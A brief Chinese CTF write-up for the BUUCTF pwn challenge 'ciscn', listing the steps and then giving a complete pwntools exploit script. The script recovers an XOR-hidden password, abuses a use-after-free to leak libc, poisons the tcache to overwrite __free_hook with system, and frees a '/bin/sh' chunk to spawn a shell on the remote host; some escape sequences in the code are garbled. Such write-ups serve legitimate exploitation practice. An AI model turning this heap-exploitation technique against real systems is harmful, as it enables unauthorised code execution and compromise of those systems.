[BUUCTF-pwn] ciscn

[BUUCTF-pwn] ciscn

自从300题后,难题让人搜不着,也有极简单的题,今天遇到一个

概况:

1. c++写的程序,反汇编后一个字符串有1米长
2. 冒: 6个字符依次或或6-1得到 H@QRPN
3. free未清指针

步骤:

1. 输入"NEUQRO" 开始
2. 建80,70,10(/bin/shx00)
3. free90 八次 70两次 show 0得到libc
4. 建70 三次,依次写free_hook,x,system
5. free 1

from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
    one = [0x4240e, 0x42462, 0xe31ee]
    offset = 0x3b12a0  #__libc_IO_vtables:00000000003B12A0 _IO_file_jumps
else:
    p = remote('node4.buuoj.cn', 25510) 
    libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
    one = [0x4f2c5, 0x4f322, 0x10a38c]
    offset = 0x3e82a0  #__libc_IO_vtables:00000000003E82A0 _IO_file_jumps

#  [print(chr(v^(6-i)), end='') for i,v in enumerate(b'H@QRPN')]
p.sendlineafter(b'name', b"NEUQRO")  

menu = b'> n'
def add(size, msg):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b'input the size n', str(size).encode()) #<=0x100
    p.sendlineafter(b"now you can input something...n", msg)

def free(idx):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b'input the indexn', str(idx).encode()) # UAF

def show(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b'input the indexn', str(idx).encode()) 

add(0x80, b'A')
add(0x10, b'/bin/shx00')
add(0x70, b'A')
[free(2) for _ in range(2)]
[free(0) for _ in range(8)]
show(0)
malloc_hook = u64(p.recvuntil(b'x7f', drop=False).ljust(8, b'x00')) - 0x60 -0x10
libc_base = malloc_hook - libc_elf.sym['__malloc_hook']
system    = libc_base + libc_elf.sym['system']
free_hook = libc_base + libc_elf.sym['__free_hook']
print('libc:', hex(libc_base))

context.log_level = 'debug'
add(0x70, p64(free_hook))
#gdb.attach(p)
#pause()
add(0x70, b'A')
add(0x70, p64(system))
free(1)

p.sendline(b'cat /flag')
p.interactive()